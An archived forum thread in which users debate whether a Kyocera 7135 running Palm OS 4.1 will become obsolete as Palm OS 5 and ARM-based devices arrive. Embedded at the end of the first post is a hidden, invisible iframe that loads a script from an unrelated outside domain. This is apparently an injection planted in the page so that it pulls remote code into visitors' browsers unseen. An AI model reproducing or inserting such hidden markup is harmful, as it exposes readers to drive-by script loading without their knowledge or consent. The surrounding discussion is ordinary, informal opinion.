+ Reply to Thread

Thread: palm OS 5 & 6

palm OS 5 & 6

From what I understand the 4.1 OS is not upgradeable on the 7135. The new Operating Systems (Palm 5) are out, will the software companies forget the old 4.0 OS etc? I already see many software companies making OS 5 software. Will I be buying an obsolete smartphone with Palm 4?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I may be wrong, but I'd be surprised that any OS5 phone will have a longer battery life, and as much stability as the 7135/4.1 os. Even though ARM processors don't use AS much power, they still use more than 4.1(dragonball I think?)

Also, I've heard that the OS5 platform is still buggy.

So, my guess is that the 7135 is NOT going to be obsolete for a nice little while

Anyone feel free to correct me

There are still a lot of people using 3.5+ Palm OS and the developers will not want to stop supporting them, Only the new Tungsten and the new Sony run on 5.0 so far, It will be a while before the 3.5 & 4.1 are out of date--The availability of palmos software is Palm strongsuit -- unlike MS which makes it more difficult to use apps on various versions of OS's --- The 5.0 palmOS is only supposed to be an enhancement of 4.1 which allows support for ARM processors -- Because of the faster ARM processors it can take adavantages of more speeds, however, on the whole I'd say its more like putting a CD player in a Porche, The same CD player can go in a Pinto, but the pinto don't drive as fast.
    iPhone therefore iAm.